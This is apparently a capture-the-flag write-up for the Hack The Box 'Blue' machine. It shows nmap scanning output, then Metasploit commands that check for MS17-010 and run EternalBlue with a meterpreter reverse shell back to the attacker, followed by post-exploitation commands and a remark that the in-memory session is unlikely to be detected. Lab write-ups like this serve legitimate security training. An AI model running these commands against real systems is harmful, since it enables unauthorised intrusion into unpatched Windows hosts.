Phase 1: Recon
- IP Address: 10.10.10.40
- Host Name:Blue
Phase 2: Scanning
Nmap
nmap -A -T4 10.10.10.40Using the “-A ” parameter enables OS and service detection , while the “-T4” enables faster execution
Nmap scan report for 10.10.10.40
Host is up (0.075s latency).
Not shown: 65526 closed ports
microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/8%OT=135%CT=1%CU=43810%PV=Y%DS=2%DC=T%G=Y%TM=5EB5D73
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=FE%TI=I%CI=I%II=I%SS=S%TS=7)
OS:OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54D
OS:NW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
OS:ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=
OS:A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=80%CD=Z)Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: -18m05s, deviation: 34m36s, median: 1m52s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-05-08T23:05:29+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-08T22:05:28
|_ start_date: 2020-05-08T22:02:01TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 75.10 ms 10.10.14.1
2 75.33 ms 10.10.10.40
Findings:
- OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
- Computer Name: haris-PC
- Open Ports: 49152-49157/tcp Microsoft Windows RPC
- smb2-security-mode: signing enabled but not required
Phase 3: Exploitation
As with most things Google is your friend .
Using the search function of Metasploit
To check and make sure it is vulnerable we can use the auxiliary scanner module
auxiliary/scanner/smb/smb_ms17_010
msf5 > use auxiliary/scanner/smb/smb_ms17_010Using show options we see we only need the rhost
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.10.10.40msf5 auxiliary(scanner/smb/smb_ms17_010) > run[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! -
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We will use exploit/windows/smb/ms17_010_eternalblue
msf5 use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp(note this exploit uses meterpreter )
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
lhost: attacker machine IP Address
(note : as we using openvpn to tunneling our network interface is named tun0, we can use that instead of the attacker IP address )
rhost : remote host or victims IP address
(note: you can also use run instead of exploit )
Phase 4: Gaining Access/Maintaining access
We are using the meterpreter session type help will give a list of all the commands available, some useful ones are,
cd - Change directorydownload - Download a file or directoryupload - Upload a file or directorygetuid - Get the user that the server is running assysinfo - Gets information about the remote system, such as OSshell - Drop into a system command shell
(note: also as the session is stored in RAM , is unlikely to detected)
From our nmap scan we know the computer name is haris-PC
using cd to change directory we can see in C:\Users that there user call haris
The flags are store on Desktop so we need to cd in to it , repeat the same with Administrator
Phase 5: Covering tracks
Exit Session
meterpreter > exit
[*] Shutting down Meterpreter...[*] 10.10.10.40 - Meterpreter session 2 closed. Reason: User exit
msf5 exploit(windows/smb/ms17_010_eternalblue) >
